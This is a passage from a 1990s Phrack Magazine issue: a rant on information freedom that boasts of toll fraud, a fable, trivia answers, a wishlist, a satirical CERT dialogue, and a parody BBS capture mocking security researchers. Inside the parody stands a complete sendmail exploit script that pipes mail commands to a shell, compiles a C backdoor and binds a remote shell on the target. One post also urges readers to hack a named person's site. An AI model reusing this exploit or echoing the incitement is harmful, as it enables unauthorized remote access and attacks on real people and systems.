  1495. Trade secrets don't want to be free, marketing projections don't want to
  1496. be free, formulas don't want to be free, troop placements don't want to
  1497. be free, CAD designs do not want to be free, corporate financial
  1498. information doesn't want to be free, my credit report sure as hell
  1499. doesn't want to be free!
  1500.  
  1501. Let's take a step back:  how to use a system IS information that should
  1502. be proliferated, how computers network IS information that should be
  1503. spread, new technologies WANT to be explained, holes ought to be pointed
  1504. out, bug patches NEED to be free...note the difference?
  1505.  
  1506. I'll end my rant with another piece of flawed logic.  At HEU a debate
  1507. raged on about why phone calls should be free.  Hey, I love a toll-fraud
  1508. device as much as the next guy (blue box tones still make me cry), and
  1509. I've used more codes in my life than a million warez couriers and I make
  1510. no bones about it...I fucking stole service!  Yippee!  Arrest me!
  1511.  
  1512. The argument stated "The lines are already there, so why should I have
  1513. to pay to use an unused line?"  Ok, fine, you don't...but you DO have
  1514. to pay for laying fiber, designing switch generic upgrades, ATM
  1515. research, compression and filtering algorithm design, video dial tone,
  1516. daily maintenance, directory assistance, operator service or any of the
  1517. hundreds of other things your old fee would go towards.  Don't like that
  1518. argument?  Fine, the tents at HEU were already there and the seats had
  1519. been layed out and were unused...get me my hundred guilders refunded.
  1520.  
  1521. -----------------------------------------------------------------------------
  1522.  
  1523. Once upon a time a Pig, a Cat, a Dog, and a Little Red Hen lived together
  1524. in a little house.  The Pig, the Cat, and the Dog were all very lazy.
  1525. The Little Red Hen had to do everything around the house by herself.
  1526.  
  1527. All the Pig, the Cat, and the Dog wanted to do was play.
  1528.  
  1529. One day, as the Little Red Hen was raking in the yard, she found some
  1530. seeds.  "Who will help me plant these grains of wheat?"  she asked.
  1531.  
  1532. "Not I," said the Pig.
  1533.  
  1534. "Not I," said the Cat.
  1535.  
  1536. "Not I," said the Dog.
  1537.  
  1538. "Then I will do it myself," said the Little Red Hen.  And she did.
  1539.  
  1540. Soon the wheat grew tall and golden.  "Who will help me cut the wheat?"
  1541. asked the Little Red Hen.
  1542.  
  1543. "Not I," said the Pig.
  1544.  
  1545. "Not I," said the Cat.
  1546.  
  1547. "Not I," said the Dog.
  1548.  
  1549. "Then I will do it myself," said the Little Red Hen.  And she did.
  1550.  
  1551. When the grain was cut and ready to be ground into flour, the Little Red
  1552. Hen asked, "Who will help me take the grain to the mill?"
  1553.  
  1554. "Not I," said the Pig.
  1555.  
  1556. "Not I," said the Cat.
  1557.  
  1558. "Not I," said the Dog.
  1559.  
  1560. "Then I will do it myself," said the Little Red Hen.  And she did.
  1561.  
  1562. When the flour came back from the mill, the Little Red Hen asked, "Who
  1563. will help me bake the bread?"
  1564.  
  1565. "Not I," said the Pig.
  1566.  
  1567. "Not I," said the Cat.
  1568.  
  1569. "Not I," said the Dog.
  1570.  
  1571. "Then I will do it myself," said the Little Red Hen.  And she did.
  1572.  
  1573. She made the flour into dough, and rolled the dough, and put it in the
  1574. oven.  When the bread was baked, she took it out of the oven.
  1575. Mmmmmmmmmm!  Didn't it smell good!
  1576.  
  1577. "Who will help me eat this bread?" asked the Little Red Hen.
  1578.  
  1579. "I will," said the Pig.
  1580.  
  1581. "I will," said the Cat.
  1582.  
  1583. "I will," said the Dog.
  1584.  
  1585. "Oh, no, you won't!" said the Little Red Hen.  "I found the seeds.  I
  1586. planted them.  I harvested the grain and took it to the mill.  I made
  1587. the flour into bread.  I did the work by myself, and now I am going to
  1588. eat the bread--all by myself."
  1589.  
  1590. And she did.
  1591.  
  1592. Think back to your childhood...didn't we learn ANYTHING?                         ==Phrack Magazine==
  1593.  
  1594.               Volume Four, Issue Forty-Four, File 3 of 27
  1595.  
  1596.  
  1597.                            //   //  /\   //   ====
  1598.                           //   //  //\\ //   ====
  1599.                          ==== //  //  \\/   ====
  1600.  
  1601.                      /\   //  // \\    //  /===   ====
  1602.                     //\\ //  //   //  //   \=\   ====
  1603.                    //  \\/    \\ //  //   ===/  ====
  1604.  
  1605.                                 PART I
  1606.  
  1607. ******************************************************************************
  1608.  
  1609. PHRACK TRIVIA
  1610.  
  1611. Last issue I tried something different.  I tried to have a little
  1612. trivia contest, giving away some prizes for the first to get all
  1613. the answers.  Well, I should have known that Phrack's readers
  1614. are lazy.  The amount of you who actually responded was pathetic.
  1615.  
  1616. The winners are:  dFx, Holistic, Damiano & Matt
  1617.  
  1618. I had planned on 5 winners.  Notice how many won.  I won't even
  1619. say how many these guys got right, because noone came close to
  1620. 100%.  Obviously I'm the only trivia buff in the underground.
  1621.  
  1622. -------------------------------------------------------------------------------
  1623.  
  1624. PHRACK TRIVIA ANSWERS
  1625.  
  1626. 1)      CCIS
  1627.         Common Channel Interoffice Signalling
  1628.  
  1629. 2)      Stimpson J. Cat's Roommate is?
  1630.         Ren Hoek
  1631.  
  1632. 3)      Name the cracker.
  1633.         Bill Landreth
  1634.  
  1635. 4)      METAL AE password.
  1636.         KILL
  1637.  
  1638. 5)      Who invented the TeleTrial?
  1639.         King Blotto
  1640.  
  1641. 6)      Name Bloom County's hacker.
  1642.         Oliver Wendell Jones
  1643.  
  1644. 7)      What was the Whiz Kids' computer named?
  1645.         RALF
  1646.  
  1647. 8)      Western Union owned what long distance service?
  1648.         MetroPhone
  1649.  
  1650. 9)      What computer read both Apple ][ and IBM PC disks?
  1651.         The Franklin ACE
  1652.  
  1653. 10)     Who made the "Charlie" board?
  1654.         John Draper
  1655.  
  1656. 11)     How many credits for a CNE?
  1657.         19
  1658.  
  1659. 12)     What was in the trunk of the Chevy Malibu?
  1660.         Dead Aliens
  1661.  
  1662. 13)     Name three bands A. Jourgensen had a hand in.
  1663.         Ministry, Revolting Cocks, Skatenigs, Pailhead, Lard, (etc.)
  1664.  
  1665. 14)     SYSTEST Password:
  1666.         UETP
  1667.  
  1668. 15)     What computer makes the best Sim Stim decks?
  1669.         Ono-Sendai
  1670.  
  1671. 16)     What magazine brought the telephone underground to national
  1672.         attention in 1971?
  1673.         Esquire
  1674.  
  1675. 17)     What is the significance of 1100 + 1700 hz?
  1676.         KP
  1677.  
  1678. 18)     What magazine was raided for publishing black box plans?
  1679.         Ramparts
  1680.  
  1681. 19)     What BBS raid spawned the headlines "Whiz Kids Zap Satellites" ?
  1682.         The Private Sector
  1683.  
  1684. 20)     CLASS
  1685.         Custom Local Area Signalling Services
  1686.  
  1687. 21)     What computer responds "OSL, Please" ?
  1688.         NT SL-1
  1689.  
  1690. 22)     RACF secures what OS?
  1691.         MVS
  1692.  
  1693. 23)     The first person to create a glider gun got what?
  1694.         $50.00
  1695.  
  1696. 24)     QRM
  1697.         Interference from another station or man-made source
  1698.  
  1699. 25)     PSS
  1700.         Packet Switch Stream
  1701.  
  1702. 26)     What PSN was acquired by GTE Telenet?
  1703.         UniNet
  1704.  
  1705. 27)     914-725-4060
  1706.         OSUNY
  1707.  
  1708. 28)     April 15, 1943
  1709.         Discovery of LSD
  1710.  
  1711. 29)     8LGM
  1712.         8-legged Grove Machine
  1713.  
  1714. 30)     WOPR
  1715.         War Operations Planned Response
  1716.  
  1717. 31)     What happened on March 1, 1990?
  1718.         Steve Jackson Games Raided By Secret Service
  1719.  
  1720. 32)     Port 79
  1721.         Finger
  1722.  
  1723. 33)     Who starred in the namesake of Neil Gorsuch's UNIX security
  1724.         mailing list?
  1725.         Sean Connery
  1726.  
  1727. 34)     What Dutch scientist did research in RF?
  1728.         Van Eck
  1729.  
  1730. 35)     What was the author of GURPS Cyberpunk better known as?
  1731.         The Mentor
  1732.  
  1733. 36)     Who would "Piss on a spark plug if he thought it would do
  1734.         any good?"
  1735.         General Berringer
  1736.  
  1737. 37)     What thinktank did Nickie Halflinger escape from?
  1738.         Tarnover
  1739.  
  1740. 38)     NCSC
  1741.         National Computer Security Center
  1742.  
  1743. 39)     Who is Pengo's favorite astronomer?
  1744.         Cliff Stoll
  1745.  
  1746. 40)     What language was Mitnik's favorite OS written in?
  1747.         BLISS
  1748.  
  1749. 41)     Abdul Alhazred wrote what?
  1750.         The Necronomicon
  1751.  
  1752. 42)     The answer to it all is?
  1753.         42
  1754.  
  1755. 43)     Who is the father of computer security?
  1756.         Donn B. Parker
  1757.  
  1758. 44)     Who wrote VCL?
  1759.         Nowhere Man
  1760.  
  1761. 45)     What kind of computer did Cosmo have?
  1762.         A Cray
  1763.  
  1764. 46)     Hetfield, Ulrich, Hammet, Newstead
  1765.         Metallica
  1766.  
  1767. 47)     What company wrote the computer game "Hacker?"
  1768.         Activision
  1769.  
  1770. 48)     Who does Tim Foley work for?
  1771.         US Secret Service
  1772.  
  1773. 49)     Who played Agent Cooper?
  1774.         Kyle MacLachlan
  1775.  
  1776. 50)     Vines runs over what OS?
  1777.         AT&T Sys V. UNIX
  1778.  
  1779. 51)     Mr. Peabody built what?
  1780.         The Way-back Machine
  1781.  
  1782. 52)     Who makes SecurID?
  1783.         Security Dynamics
  1784.  
  1785. 53)     What's in a Mexican Flag?
  1786.         White Tequila, Green Creme de Menthe & Grenadine, layered
  1787.  
  1788. 54)     Who created Interzone?
  1789.         William S. Burroughs
  1790.  
  1791. 55)     JAMs (as led by John Dillinger)
  1792.         Justified Ancients of MU
  1793.  
  1794. 56)     Abbie Hoffman helped start what phreak magazine?
  1795.         YIPL
  1796.  
  1797. 57)     What was once "Reality Hackers?"
  1798.         Mondo 2000
  1799.  
  1800. 58)     Gates and Allen "wrote" BASIC for what computer?
  1801.         The Altair
  1802.  
  1803. 59)     Tahoe is related to what OS?
  1804.         BSD Unix
  1805.  
  1806. 60)     CPE 1704 TKS is what?
  1807.         Launch Code from Wargames
  1808.  
  1809. 61)     Telemail's default was what?
  1810.         A
  1811.  
  1812. 62)     "Do Androids Dream of Electric Sheep" became what?
  1813.         Blade Runner
  1814.  
  1815. 63)     What broadcasts between roughly 40 and 50 mhz?
  1816.         Cordless Phones
  1817.  
  1818. 64)     Who created Tangram, Stratosphere, and Phaedra among others?
  1819.         Tangerine Dream
  1820.  
  1821. 65)     What was Flynn's most popular video game?
  1822.         Space Paranoids
  1823.  
  1824. 66)     Who lived in Goose Island, Oregon?
  1825.         Dr. Steven Falken
  1826.  
  1827. 67)     516-935-2481
  1828.         Plovernet
  1829.  
  1830. 68)     What is the security of ComSecMilNavPac?
  1831.         9
  1832.  
  1833. 69)     What has the "spiral death trap?"
  1834.         Qix
  1835.  
  1836. 70)     Who was the Midnight Skulker?
  1837.         Mark Bernay
  1838.  
  1839. 71)     TMRC
  1840.         Tech Model Railroad Club
  1841.  
  1842. 72)     Who wrote "Jawbreaker?"
  1843.         John Harris
  1844.  
  1845. 73)     213-080-1050
  1846.         Alliance Teleconferencing, Los Angeles
  1847.  
  1848. 74)     What is the Tetragrammaton represented as?
  1849.         YHVH (or IHVH)
  1850.  
  1851. 75)     Who is Francis J. Haynes?
  1852.         Frank (of the Phunny Phone Call fame)
  1853.  
  1854. 76)     Who ran into one of the Akira test subjects?
  1855.         Tetsuo Shima
  1856.  
  1857. 77)     What had "Munchies, Fireballs and Yllabian Space Guppies?"
  1858.         Stargate
  1859.  
  1860. 78)     PARC
  1861.         Palo Alto Research Center
  1862.  
  1863. 79)     Alex and his droogs hung out where?
  1864.         The Korova Milk Bar
  1865.  
  1866. 80)     Jane Chandler in DC's "Hacker Files" is based on who?
  1867.         Gail Thackeray
  1868.  
  1869. 81)     The Artificial Kid lives on what planet?
  1870.         Reverie
  1871.  
  1872. 82)     208057040540
  1873.         QSD
  1874.  
  1875. 83)     What are the two most common processors for cellular phones?
  1876.         8051 & 68HC11
  1877.  
  1878. 84)     Who came up with the term "ICE?"
  1879.         Tom Maddox
  1880.  
  1881. 85)     What group is hoped might help the "Angels" contact RMS?
  1882.         The Legion of Doom
  1883.  
  1884. 86)     Who is Akbar's friend?
  1885.         Jeff
  1886.  
  1887. 87)     What company's games was David Lightman after?
  1888.         Protovision
  1889.  
  1890. 88)     26.0.0.0
  1891.         NET-MILNET
  1892.  
  1893. 89)     Who was Mr. Slippery forced to locate?
  1894.         The Mailman
  1895.  
  1896. 90)     Who is "The Whistler?"
  1897.         Joe Engressia
  1898.  
  1899. 91)     What use would a 6.5536 crystal be?
  1900.         Making a red box
  1901.  
  1902. 92)     .--.  ....  .-.   .-  -.-.  -.-
  1903.         PHRACK
  1904.  
  1905. 93)     The Dark Avenger likes what group?
  1906.         Iron Maiden
  1907.  
  1908. 94)     What book spawned the term "worm?"
  1909.         The Shockwave Rider
  1910.  
  1911. 95)     Michael in "Prime Risk" wanted money for what?
  1912.         Flying Lessons
  1913.  
  1914. 96)     Automan's programmer worked for who?
  1915.         The Police Department
  1916.  
  1917. 97)     What signal filled in keystrokes on TOPS-20?
  1918.         ESC
  1919.  
  1920. 98)     ITS
  1921.         Incompatible Time-sharing System
  1922.  
  1923. 99)     (a/c)+121
  1924.         Inward Operator
  1925.  
  1926. 100)    What drug kept the scanners sane?
  1927.         Ephemerol
  1928.  
  1929. Bonus 1
  1930. 3 pts   Name three bodies of work by Andrew Blake?
  1931.         Night Trips
  1932.         Night Trips 2
  1933.         Hidden Obsessions
  1934.         Secrets
  1935.         (etc.)
  1936.  
  1937. Bonus 2
  1938. 3 pts   Name three currently available titles with Norma Kuzma.
  1939.         Fast Food
  1940.         Not of This Earth
  1941.         Cry Baby
  1942.         Laser Moon
  1943.         (etc.)
  1944.  
  1945. Bonus 3
  1946. 4 pts   Why would I hate Angel Broadhurst?
  1947.         Because he was living with Christina Applegate.  (Duh)
  1948.  
  1949. *******************************************************************************
  1950.  
  1951.                **  PHRACK MAGAZINE NEEDS THE FOLLOWING **
  1952.  
  1953.     Any Storage Device Capable of Writing ISO-9660 Format + Software
  1954.       (IE: Personal ROM-Writer, Pinnacle Optical Drive, MicroBoard)
  1955.  
  1956.                     A Flatbed 24-Bit Color Scanner
  1957.  
  1958.                             SCSI Hard Drives
  1959.  
  1960.                       486 or Pentium Processors
  1961.  
  1962.         SGI Indy/Indigo/Crimson/Iris/Challenge II/Onyx  (Any would do)
  1963.  
  1964.                      Spectrum Analysis Equipment
  1965.  
  1966.                               Oscilloscopes
  1967.  
  1968.             Horizontal & Vertical Sync Adjustment Equipment
  1969.  
  1970.                     Miscellaneous Ham Radio Equipment
  1971.  
  1972.      Any donations will be generously rewarded with k-rad info and
  1973.                         huge amounts of good karma.
  1974.  
  1975. ** PHRACK MAGAZINE DOESN'T REALLY NEED BUT KINDA WOULD LIKE THE FOLLOWING **
  1976.  
  1977.                The Drew Barrymore Home Video (The Motel One)
  1978.  
  1979.            The Christina Applegate "Home Video"  (The Poker One)
  1980.  
  1981.                            Xuxa's "Early" Films
  1982.  
  1983.                   Howard Stern's "Banned by the FCC" CD
  1984.  
  1985.                       Jennie Garth's Workout Tape
  1986.  
  1987.               The European Smut Mag with Alissa Milano in it.
  1988.  
  1989. *******************************************************************************
  1990.  
  1991.  
  1992. [Something very humorous I found on the FireWalls List]
  1993.  
  1994. A one-act play
  1995.  
  1996. Dramatis Personae:
  1997.  Perry Metzger (PM): an AVP responsible for the firewall at a
  1998.                             Fortune 100 company.
  1999.         Joe Cert (JC): A person at CERT supposed to be helping.
  2000.  
  2001. [The scene opens to Perry on the phone with Joe Cert. Perry is at work
  2002. and freaking out because he doesn't run Sun sendmail and doesn't know
  2003. what to do. If he turns off mail, his users will kill him. He has no
  2004. idea how many machines he has to fix or if he has a problem at all.]
  2005.  
  2006. PM: Well, I have the problem that I don't normally run Sun sendmail,
  2007. and I can't run it, so I need to know enough that I can figure out how
  2008. to fix my security problem.
  2009.  
  2010. JC: Well, we don't have a procedure to tell people anything beyond
  2011. what we put in the advisory.
  2012.  
  2013. PM: I run the gateway for a firm that trades hundreds of billions of
  2014. dollars a day in the financial markets. We can't afford do get shut
  2015. down. Isn't there any way you can tell me anything that can help me?
  2016.  
  2017. JC: Well, we really don't have a procedure in place.
  2018.  
  2019. PM: I see. Can I ask you some questions?
  2020.  
  2021. JC: Sure.
  2022.  
  2023. PM: So this problem, would it be fixed if I had the Prog mailer turned
  2024. off on my machines?
  2025.  
  2026. JC: Well, its a problem that will allow people to run programs on your
  2027. machine.
  2028.  
  2029. PM: Yes, but would turning off the Prog mailer fix it?
  2030.  
  2031. JC: Well, the problem allows people to run programs on your machine.
  2032.  
  2033. PM: I see. Will this problem only hurt machines that have direct TCP
  2034. access to the internet, or are machines that can get mail indirectly
  2035. also possibly affected?
  2036.  
  2037. JC: The hole is exploited by sending mail to the machine.
  2038.  
  2039. PM: Yes, but do you need SMTP access to the machine, or will just
  2040. being able to send mail to it hurt you?
  2041.  
  2042. JC: Well, the hole is exploited by sending mail to the machine.
  2043.  
  2044. PM: look, the machine on my firewall can't be telneted to. Does that
  2045. make me safe?
  2046.  
  2047. JC: Well, the hole is exploited by sending mail to the machine.
  2048.  
  2049. PM: Listen, I have THREE THOUSAND workstations in a dozen cities on
  2050. three continents. Are you telling me that I have to tell all my people
  2051. that they are working the weekend installing a new sendmail on every
  2052. machine in the firm? I don't even know how to test to see if I've
  2053. fixed the problem once I've done that!
  2054.  
  2055. JC: Well, the whole is exploited by sending mail to the machine.
  2056.  
  2057. PM: Can't you tell me any details?
  2058.  
  2059. JC: We really don't have a procedure for that.
  2060.  
  2061. PM: Do you know what the problem is?
  2062.  
  2063. JC: I can reproduce it, yes.
  2064.  
  2065. PM: Look, I work for a company with REAL MONEY on the line here. I can
  2066. get you a letter from a managing director telling you that I'm legit.
  2067. You can check who we are in any newspaper -- we're one of the largest
  2068. investment banks in the world. Every day the Wall Street Journal lists
  2069. the Lehman Brothers T-Bond Index on page C-1. You can check my
  2070. criminal record -- hell, the SEC makes you get fingerprinted so many
  2071. times around here that I've still got ink on my fingers from the last
  2072. time. Can't you give me some help here?
  2073.  
  2074. JC: We really don't have a procedure for doing that. I'm taking
  2075. notes, though, and I'll tell my management of your concerns.
  2076.  
  2077. [He continues in this vein, but eventually, our hero gives up,
  2078. realizing that CERT is part of the problem, not the solution. All
  2079. they've succeeded in doing is keeping him up at night. He can't fix
  2080. his problem, since he doesn't know how. He has no idea if he has a
  2081. problem. He can't check once he's done something to determine if he's
  2082. fixed it. All he knows is that CERT has no procedure for telling him
  2083. anything regardless of who he is, period.]
  2084.  
  2085. PM: So what you are telling me is that if I want details I have to
  2086. subscribe to 2600 Magazine?
  2087.  
  2088. JC: We don't have a procedure for giving you more information, no.
  2089.  
  2090. PM: I'm sure the crackers will be happy to hear that. They are likely
  2091. telling each other at a nice high speed.
  2092.  
  2093. *******************************************************************************
  2094.  
  2095.                     IF SECURITY TYPES WERE K-RAD
  2096.                                PART II
  2097.  
  2098.  
  2099. SecurNet BBS Captures
  2100. (From the LODCOM BBS Archive Project)
  2101. ------------------------------------------------------------------------------
  2102.  
  2103. Number  :) 214
  2104. From    :) Uncertain Future
  2105. Subject :) Get a life
  2106.  
  2107. Hey All,
  2108.  
  2109. Everyone out there who keeps calling up the Hotline
  2110. begging for BUGS can just get a life.
  2111.  
  2112. If you have to ask, you don't deserve to know.
  2113.  
  2114. UnCERTian Future
  2115.  
  2116. [A]uto reply [N] [R]e-read [Q]uit:N
  2117.  
  2118. Number  :) 215
  2119. From    :) Spaf Master
  2120. Subject :) ...
  2121.  
  2122. Rum0r haz 1t that a p13cE 0f sH1t hAqu3r
  2123. Nam3d Sk0tt ChaZ1n iz 0n Th3 F1RST l1zt!*&@$
  2124.  
  2125. 3yE hAv3 Try3D 2 g3t h1m Rem0v3D ButT n0-1
  2126. 0N th3 l1sT w1lL d3w 1t!!
  2127.  
  2128. Y Kan'T w3 d0 s0meth1ng aB0uT tHeze pr1ckz?
  2129.  
  2130. 1 r3MeMb3r a dAy Wh3n 1t 0nLy t0oK a PhAx
  2131. thR3at3n1nG 2 3nD mY sUpP0rT w0ulD g3t
  2132. a CumSek Haqu3r lyK3 ChaZ1n R3m0v3D!@!#
  2133.  
  2134. Sh1T!
  2135.  
  2136. --spaf
  2137. Forum Of OverLordS
  2138.  
  2139. [A]uto reply [N] [R]e-read [Q]uit:N
  2140.  
  2141. Number  :) 216
  2142. From    :) Zen
  2143. Subject :) Who died and left you in charge?
  2144.  
  2145. You suck Jeanie.
  2146.  
  2147. Who said YOU got to be the master?
  2148. Your group sucks too.  You have obsolete info.
  2149. You guys say "There is nothing you have that we can
  2150. not possess?"  Well, there is nothing you have that
  2151. WE want to possess.
  2152.  
  2153. I think I will begin shooting off my mouth at
  2154. Usenix Security BOFs and in Risks and in
  2155. mailing lists, then maybe I can be as ELEET as
  2156. you.  NOT!
  2157.  
  2158. Zen
  2159. Legion of Security Types
  2160.  
  2161. [A]uto reply [N] [R]e-read [Q]uit:N
  2162.  
  2163. Number  :) 217
  2164. From    :) Hackman
  2165. Subject :) I Dream of Geneie
  2166.  
  2167. Yo Yo Yo...
  2168.  
  2169. I think someone wants to be the next Donn Parker.
  2170. Similarities:
  2171.  
  2172. 1)  Has BIG mouth
  2173. 2)  Writes Worthless Books
  2174. 3)  Hoardes inpho from invisible enemy
  2175. 4)  Goes on and on about "Evil Crackers"
  2176.  
  2177. You should start charging 5000+ dollar speaking fees
  2178. and shave your head.  THEN, maybe someone will
  2179. hire your worthless self, and you can emerge
  2180. from Academia into the REAL world.  Nah...you are
  2181. too LAME!
  2182.  
  2183. HACKMAN
  2184. Legion of Security Types
  2185.  
  2186. [A]uto reply [N] [R]e-read [Q]uit:N
  2187.  
  2188. Number  :) 218
  2189. From    :) American Eagle
  2190. Subject :) hey.
  2191.  
  2192. You two punks think you are so kool, don't you?
  2193. I was developing security theory when you were
  2194. in junior high.  You need to get your asses
  2195. kicked, and I'm the guy to do it.
  2196.  
  2197. About my speaking fees...Youre jealous.  See green often?
  2198. You wish your k-rad companies (pffft) would pay you
  2199. as well.  BAH.
  2200.  
  2201. AE
  2202.  /q
  2203. .
  2204. \s
  2205.  
  2206.  
  2207. end/
  2208. stop
  2209. ,
  2210.  
  2211. [A]uto reply [N] [R]e-read [Q]uit:N
  2212.  
  2213. Number  :) 219
  2214. From    :) Captian VAX
  2215. Subject :) New BBS
  2216.  
  2217. Hello,
  2218.  
  2219. I am putting up a new bbs to be a forum for a database
  2220. on bugs and security problems.  If you are interested,
  2221. please send me email on here or on internet.
  2222.  
  2223. Thx
  2224.  
  2225. CV
  2226.  
  2227. [A]uto reply [N] [R]e-read [Q]uit:N
  2228.  
  2229. Number  :) 220
  2230. From    :) The BeanCounter
  2231. Subject :) STUPH
  2232.  
  2233. HEY...I AM NOT SURE BUT I THINK
  2234. MY ACCOUNT AT DOCKMASTER HAS BEEN
  2235. HACKED OUT.  IF ANY1 KNOWS WHO
  2236. DID IT LET ME KNOW.
  2237.  
  2238. I AM REALLY PISSED!  THATS WHAT
  2239. HAPPENS WHEN PEOPLE GET SLOPPY AND
  2240. THEY LET ON JUST ANYONE WHO CAN
  2241. FILL OUT THE FORM!  CAN WE LIE DOWN
  2242. WITH DOGS AND EXPECT NOT TO GET UP
  2243. WITH FLEAS?
  2244.  
  2245. WHM
  2246.  
  2247. [A]uto reply [N] [R]e-read [Q]uit:N
  2248.  
  2249. Number  :) 221
  2250. From    :) Spaf Master
  2251. Subject :) fUq U alL
  2252.  
  2253. 33t sh1T u Pr1Kz!#!$@
  2254.  
  2255. 3yE m M0r3 3l33t thAn alL 0f u!!!
  2256.  
  2257. U w1lL All F3el mY wRatH!
  2258.  
  2259. Ey3 Hav3 ur InPh0!@$@  1 w1Ll b3 kaLl1nG 3aCh
  2260. 0f U v3Ry so()n.
  2261.  
  2262. --spaf
  2263. Forum Of OverLordS
  2264.  
  2265. [A]uto reply [N] [R]e-read [Q]uit:N
  2266.  
  2267. Number  :) 222
  2268. From    :) Venom
  2269. Subject :) Fuck!
  2270.  
  2271. Now I'm mad.  That bastard Chasin posted the Sendmail Bug on
  2272. The firewalls list!  Now all the hackers will have it!
  2273.  
  2274. I'm going to take him down. Anyone who wants to help, his
  2275. site is crimelab.com.  You can check the Forum's
  2276. Codeline for further developments.
  2277.  
  2278. Get your scripts ready!  Let's hack the little prick!
  2279.  
  2280. Venom
  2281.  
  2282. [A]uto reply [N] [R]e-read [Q]uit:N
  2283.  
  2284. Number  :) 223
  2285. From    :) American Eagle
  2286. Subject :) Sendmail
  2287.  
  2288. What is the sendmail bug?
  2289.  
  2290. AE
  2291.  
  2292. [A]uto reply [N] [R]e-read [Q]uit:N
  2293.  
  2294. Number  :) 224
  2295. From    :) Uncertian Future
  2296. Subject :) Sendmail
  2297.  
  2298. The Sendmail bug is a bug that works using sendmail.
  2299.  
  2300. This bug works on hosts using sendmail and can allow
  2301. people to do things from remote through sendmail.
  2302.  
  2303. I know the bug, but I'm not going to give it out.
  2304.  
  2305. Forum Members can get it from the Database
  2306. on CertNet.
  2307.  
  2308. UnCERTian Future
  2309.  
  2310. [A]uto reply [N] [R]e-read [Q]uit:N
  2311.  
  2312. Number  :) 225
  2313. From    :) The BeanCounter
  2314. Subject :) SENDMAIL
  2315.  
  2316. ED:
  2317.  
  2318. I DON'T HAVE ACCESS TO THE DATABASE
  2319. ON CERTNET.
  2320.  
  2321. COULD YOU SEND IT TO ME IN EMAIL?
  2322.  
  2323. WHM
  2324.  
  2325. [A]uto reply [N] [R]e-read [Q]uit:N
  2326.  
  2327. Number  :) 226
  2328. From    :) Uncertian Future
  2329. Subject :) Bill...
  2330.  
  2331. Yes, you do.  All Members of The Forum
  2332. have access.  I will call you and tell you
  2333. how to access it.  Remember, UNIX
  2334. is case sensitive.  If this is a problem, you
  2335. will have to use another computer.
  2336.  
  2337. UnCERTian Future
  2338. Forum Of OverLordS
  2339.  
  2340. [A]uto reply [N] [R]e-read [Q]uit:N
  2341.  
  2342. Number  :) 227
  2343. From    :) Information Warrior
  2344. Subject :) InterNuts
  2345.  
  2346. I have been having a really dumb conversation on the
  2347. net with a moron who wants to argue about HERF with ME!
  2348. WITH ME!  Can you believe it?  I almost want to strangle the
  2349. guy.  Some college kid, but still...
  2350.  
  2351. The new file is due out soon.  I will place it in the
  2352. upload section in .zip format.  Someone will have to
  2353. unzip it for Donn and Bill.  I don't think they have
  2354. figured that utility out yet.
  2355.  
  2356. [A]uto reply [N] [R]e-read [Q]uit:N
  2357.  
  2358. Number  :) 228
  2359. From    :) Hackman
  2360. Subject :) Sendmail Bug.  Dig it.
  2361.  
  2362. You Forum people piss me off.  Turn on your buffers everyone
  2363. cuz here comes the bug.  Fuck you if you don't like it.
  2364.  
  2365.  
  2366. ------Cut Here--------
  2367. #!/bin/sh
  2368. # Copyright, 1992, 1993 by Scott Chasin (chasin@crimelab.com)
  2369. #
  2370. # This material is copyrighted by Scott Chasin, 1992, 1993. The
  2371. # usual standard disclaimer applies, especially the fact that the
  2372. # author is not liable for any damages caused by direct or indirect
  2373. # use of the information or functionality provided by this program.
  2374. #
  2375. # Description:
  2376. #
  2377. # Exploit NEW sendmail hole  and bind a port so we can spawn a program.
  2378. # Not for distribution under any circumstances
  2379. #
  2380. # Usage: smail <hostname> <target-user-name> <target-port> <shell command>
  2381. # default: smail <localhost> <daemon> <7001> </bin/sh>
  2382.  
  2383. port=$3
  2384. user=$2
  2385. cmd=$4
  2386.  
  2387. if [ -z "$2" ]; then
  2388.    user=daemon
  2389. fi
  2390.  
  2391. if [ -z "$3" ]; then
  2392.    port=7002
  2393. fi
  2394.  
  2395. if [ -z "$4" ]; then
  2396.    cmd="/bin/csh -i"
  2397. fi
  2398.  
  2399. (
  2400. sleep 4
  2401. echo "helo"
  2402. echo "mail from: |"
  2403. echo "rcpt to: bounce"
  2404. echo "data"
  2405. echo "."
  2406. sleep 3
  2407. echo "mail from: $user"
  2408. echo "rcpt to: | sed '1,/^$/d' | sh"
  2409. echo "data"
  2410. echo "cat > /tmp/a.c <<EOF"
  2411. cat <<  EOF
  2412. #include <sys/types.h>
  2413. #include <sys/signal.h>
  2414. #include <sys/socket.h>
  2415. #include <netinet/in.h>
  2416. #include <netdb.h>
  2417. reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
  2418. int **av;{struct sockaddr_in mya;struct servent *sp
  2419. ;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
  2420. signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
  2421. 0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
  2422. sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))
  2423. ==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
  2424. =htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
  2425. (struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
  2426. 1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
  2427. (select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
  2428. loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
  2429. ==0){for(x=2;x<maxfd;x++)if(x!=new)close(x);for(x=0;x<
  2430. NSIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup2
  2431. (0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new);
  2432. goto loop;}
  2433. EOF
  2434. echo "EOF"
  2435. echo "cd /tmp"
  2436. echo "/bin/cc /tmp/a.c"
  2437. echo "/bin/rm a.c"
  2438. echo "/tmp/a.out $port $cmd"
  2439. echo "."
  2440. echo "quit"
  2441. ) | mconnect $1
  2442. ---------------------------------------------------------------------
  2443.  
  2444.  
  2445. This Buffer Brought To You By:  L.O.S.T
  2446.  
  2447. Greets Going Out To: The Great Circle, Apple-Man, Casper The Ghost,
  2448.                      Zen and the L.O.S.T Posse!
  2449.  
  2450.  
  2451. [A]uto reply [N] [R]e-read [Q]uit:N
  2452.  
  2453. Number  :) 229
  2454. From    :) Spaf Master
  2455. Subject :) D1CK!!!
  2456.  
